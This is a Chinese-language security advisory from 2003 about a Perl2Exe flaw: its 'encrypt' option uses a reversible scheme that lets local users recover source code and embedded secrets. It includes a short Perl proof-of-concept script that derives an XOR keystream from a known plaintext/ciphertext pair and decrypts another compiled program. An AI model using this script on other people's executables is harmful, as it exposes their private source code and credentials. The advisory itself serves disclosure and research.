Perl2Exe转换处理不正确漏洞
发布日期:2003-02-21
更新日期:2003-02-27
受影响系统:IndigoSTAR Software Perl2Exe 6.0
IndigoSTAR Software Perl2Exe 5.02
IndigoSTAR Software Perl2Exe 1.09
描述:
BUGTRAQ ID:
6909
Perl2Exe是一款把Perl程序"编译"成EXE的程序。
Perl2Exe存在设计问题,本地攻击者可以利用这个漏洞获得源代码中的敏感信息。
Perl2Exe在转换Perl为可执行格式程序时,如果选择"encrypt"选项会采用可逆算法,本地用户可以通过简单编程获得源代码中包含的敏感信息。
<*来源:Domainbox, Tim Abenath (
ta@domainbox.de)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=104586228822675&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Domainbox, Tim Abenath (
ta@domainbox.de)提供了如下测试方法:
#!/usr/bin/perl
$known_plain = `cat sample.pl`;
$known_cipher_file = "sample";
$sizeline = `tail -c +811048 $known_cipher_file | strings | grep
NAME=_main.pl`;
@line = split /;/, $sizeline;
@size = split /\=/, $line[1];
$known_cipher = `tail -c +811048 $known_cipher_file | head -c $size[1]`;
$key = $known_cipher ^ $known_plain;
$unknown_cipher = `tail -c +811048 perl2exe | head -c $size[1]`;
$unknown_plain = $unknown_cipher ^ $key;
print $unknown_plain, "\n";
建议:
厂商补丁:
IndigoSTAR Software
-------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.indigostar.com/浏览次数:3225
严重程度:0(网友投票)
